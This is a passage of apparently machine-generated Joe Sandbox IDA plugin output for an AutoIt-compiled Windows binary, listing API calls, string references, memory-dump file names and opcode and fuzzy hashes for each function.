                                                                                                                                        • Opcode Fuzzy Hash: 00794c2e62ffe143ff559ad77494e55124b7c4967d01bc65fccb362da9f79efb
                                                                                                                                        • Instruction Fuzzy Hash: AC41C431E041099FCB14EFA8C8819FEBBF5FF5A310F2440A9E505A7251EB749E81CB90
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00B9D130
                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B9D13A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                        • String ID: |
                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                        • Opcode ID: 5e301ffd8b410a8fb2e1c1c73f2f2bfb9b53833328e95d88e4b4089b04eb0073
                                                                                                                                        • Instruction ID: 6a01db412db8e6e1046133d54cfbc68121894533aa95654b61fe345dc57878cb
                                                                                                                                        • Opcode Fuzzy Hash: 5e301ffd8b410a8fb2e1c1c73f2f2bfb9b53833328e95d88e4b4089b04eb0073
                                                                                                                                        • Instruction Fuzzy Hash: B5313C71D01129ABCF15EFA5DC85AEE7FB9FF04300F1000A9F819A6161DB31AA06DB50
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00BB3621
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BB365C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                        • Opcode ID: 06b1a69e9733d5200405da65f55c6d5117dbda487debdf704b92d0eecceca961
                                                                                                                                        • Instruction ID: 52f5516fbd31a8362518ea2fde5c4fa409bfaa49edbc38abde9a0b273268a844
                                                                                                                                        • Opcode Fuzzy Hash: 06b1a69e9733d5200405da65f55c6d5117dbda487debdf704b92d0eecceca961
                                                                                                                                        • Instruction Fuzzy Hash: FE319071110604AFDB24DF28DC80EFB77E9FF58B20F108659F8A697290DA70AD81D760
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BB461F
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB4634
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: '
                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                        • Opcode ID: afeda0770f09da30bb293631d84084f76adf08f913ca86ee793835e844d7f22d
                                                                                                                                        • Instruction ID: dcf299eb2516f72f018d8bf41c94ccf90451a00a8e2564cb131db220bfa5ecbc
                                                                                                                                        • Opcode Fuzzy Hash: afeda0770f09da30bb293631d84084f76adf08f913ca86ee793835e844d7f22d
                                                                                                                                        • Instruction Fuzzy Hash: DC313874A006199FDF14CFA9C980BEA7BF5FF19300F1044AAE905AB342D7B0A941CF90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BB327C
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB3287
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        • Opcode ID: 494abe3463061640bcd6b6ffb280783c52ba547de0fab81285e87b1e07d4553b
                                                                                                                                        • Instruction ID: ad6b01df84cf32919d5a00b9867b1268ee6278ce260305b35da3eff426247fb7
                                                                                                                                        • Opcode Fuzzy Hash: 494abe3463061640bcd6b6ffb280783c52ba547de0fab81285e87b1e07d4553b
                                                                                                                                        • Instruction Fuzzy Hash: 7011B2717002087FEF219E94DC81EFB3BEAEB987A4F104668F91897290D6B1DD518760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B2604C
                                                                                                                                          • Part of subcall function 00B2600E: GetStockObject.GDI32(00000011), ref: 00B26060
                                                                                                                                          • Part of subcall function 00B2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B2606A
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BB377A
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00BB3794
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                        • Opcode ID: 89d7422bd5844db79dfa8eeb92c0ce3936d39492ec09da0d2946f71318d94637
                                                                                                                                        • Instruction ID: 1bd1b523f7f1312d89e201da9e8e7ec59af367c1429b2fa516bcaae3a84f73cc
                                                                                                                                        • Opcode Fuzzy Hash: 89d7422bd5844db79dfa8eeb92c0ce3936d39492ec09da0d2946f71318d94637
                                                                                                                                        • Instruction Fuzzy Hash: 3D1117B2610209AFDB10DFA8CC46EFA7BF8EB08754F004A54F955E3250EB75E851DB60
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B9CD7D
                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B9CDA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                        • Opcode ID: 90fa03838390d545ed95882d8e9eccff3de5bdc165b5e21c7cab0b61abd6e546
                                                                                                                                        • Instruction ID: 4d39175195eb5a055fec7e9b7da823671ddb75d8e71841772997e29e031be5f9
                                                                                                                                        • Opcode Fuzzy Hash: 90fa03838390d545ed95882d8e9eccff3de5bdc165b5e21c7cab0b61abd6e546
                                                                                                                                        • Instruction Fuzzy Hash: C211C6B12056317ADB344B668C85EE7BEECEF127A4F1042B6B11983090D7709840D6F0
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00BB34AB
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BB34BA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        • Opcode ID: 9c32758127eb51bbb36b467b2981f41f9a58f0feac6b57e7fe9cdabcc16300b2
                                                                                                                                        • Instruction ID: d76a9f27188672d6c99486bd08662253863d1a1242a510719b2eaa7024f70d55
                                                                                                                                        • Opcode Fuzzy Hash: 9c32758127eb51bbb36b467b2981f41f9a58f0feac6b57e7fe9cdabcc16300b2
                                                                                                                                        • Instruction Fuzzy Hash: A2119171100108AFEB128E68DC84AFB3BEAEF15B74F504764F965972E0CBB1DC919750
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00B86CB6
                                                                                                                                        • _wcslen.LIBCMT ref: 00B86CC2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                        • String ID: STOP
                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                        • Opcode ID: 8ef0b6bb5d32d7712cb9ed815b9eb88e972cd3c63c8741680a73fe50baa55b27
                                                                                                                                        • Instruction ID: 9b1d79daf685dd7c4bdfe05184e30758a6a8ca7b20baa71b78975a09bc9b6407
                                                                                                                                        • Opcode Fuzzy Hash: 8ef0b6bb5d32d7712cb9ed815b9eb88e972cd3c63c8741680a73fe50baa55b27
                                                                                                                                        • Instruction Fuzzy Hash: 4001C032A1052A8BCB21BFBDDC809BF77E5FB61710B1009B8E866971A4EB31D950CB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B81D4C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                        • Opcode ID: 30aa23eab1e75e8922d7a9c20d6deb4becc97bff03dc7505bb58fe3e2b1bfca9
                                                                                                                                        • Instruction ID: 655bf816c8964427e13b84b2eeb4557c8dd695df33c8b8eeb3da959c2651010f
                                                                                                                                        • Opcode Fuzzy Hash: 30aa23eab1e75e8922d7a9c20d6deb4becc97bff03dc7505bb58fe3e2b1bfca9
                                                                                                                                        • Instruction Fuzzy Hash: BE01D875601228ABCB14FFA4DC51DFE77E8FB46750F040AA9F82A672E1EA305909C760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B81C46
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                        • Opcode ID: d9c5c14781ef3d5c2a43950bcbaff1cabc67bf543bef9571382d48aef8176c02
                                                                                                                                        • Instruction ID: 8e2ee8bf504a12f8357a9e52ee751a1f7a5af9ebeff77e58a5ad64c5af5bdf64
                                                                                                                                        • Opcode Fuzzy Hash: d9c5c14781ef3d5c2a43950bcbaff1cabc67bf543bef9571382d48aef8176c02
                                                                                                                                        • Instruction Fuzzy Hash: 9501F775A81118A7CB14FBA4D951DFF77ECEB11740F140499A40A6B2A1EA209E09CBB1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B81CC8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                        • Opcode ID: b8ab3c558f2caa7442d4f5658512b950d099a5d7f281616631cfc5f3e283f486
                                                                                                                                        • Instruction ID: 5e0e3c1f7a77fe7591d6e2430d5f406517d426137e423e98c41c483d3860a94a
                                                                                                                                        • Opcode Fuzzy Hash: b8ab3c558f2caa7442d4f5658512b950d099a5d7f281616631cfc5f3e283f486
                                                                                                                                        • Instruction Fuzzy Hash: 0B014EB174111867CB14FBA4DA51EFF73ECDB11740F140495B80A77291EA608F09CB71
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B81DD3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                        • Opcode ID: 4e8bc47b91f4abb5cbe0c1ee5284e59c661ac436142f1705ae7ff49ebc5efd75
                                                                                                                                        • Instruction ID: 82e909d6c7231b87247b2c7979a3b75e3144d90c88cd8fd01bb364489dbde1f9
                                                                                                                                        • Opcode Fuzzy Hash: 4e8bc47b91f4abb5cbe0c1ee5284e59c661ac436142f1705ae7ff49ebc5efd75
                                                                                                                                        • Instruction Fuzzy Hash: 07F0A971A5122867D714F7A4DC91FFE77ECEB01750F040DA5B826672E1DA605909C760
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen
                                                                                                                                        • String ID: 3, 3, 16, 1
                                                                                                                                        • API String ID: 176396367-3042988571
                                                                                                                                        • Opcode ID: a891eeebcbc81d3a5071860b872ec9d897cba2e016b86c571c36c561b0fa211b
                                                                                                                                        • Instruction ID: 65717e9cef473bee9212aadadc48d97b53458afa212c6e1acf76d0c00182b15a
                                                                                                                                        • Opcode Fuzzy Hash: a891eeebcbc81d3a5071860b872ec9d897cba2e016b86c571c36c561b0fa211b
                                                                                                                                        • Instruction Fuzzy Hash: 2BE02B0225C220149231127A9CC1A7F57CDCFCE75071018ABF981C2366EF948EA2B3A0
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B80B23
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                        • Opcode ID: fd006df6c42a1ab42b6c519e1e5e8474859f30f4ab3f896b7a6814872bde690f
                                                                                                                                        • Instruction ID: ed71b92461de46de11c02b6daae76c90fd7811db1a70d55caf4d27f2ad44022a
                                                                                                                                        • Opcode Fuzzy Hash: fd006df6c42a1ab42b6c519e1e5e8474859f30f4ab3f896b7a6814872bde690f
                                                                                                                                        • Instruction Fuzzy Hash: 11E0D8322843182BD2147A957C03FD97FC4CF05B50F2004E6FB88554D38FE1685046E9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B3F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B40D71,?,?,?,00B2100A), ref: 00B3F7CE
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00B2100A), ref: 00B40D75
                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B2100A), ref: 00B40D84
                                                                                                                                        Strings
                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B40D7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                        • Opcode ID: 500030b07a8e301486526886942c4fb99723154715d0928d883bb9208e228e13
                                                                                                                                        • Instruction ID: 252017aa793e8a5a480fb3fb7e1e17bea1358f9c14595fa97c8fc290cd350f38
                                                                                                                                        • Opcode Fuzzy Hash: 500030b07a8e301486526886942c4fb99723154715d0928d883bb9208e228e13
                                                                                                                                        • Instruction Fuzzy Hash: E1E06D706003128BD720AFBCE8047627BE0AF04740F008ABDE986C7651DBF5E5488BA1
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B9302F
                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B93044
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
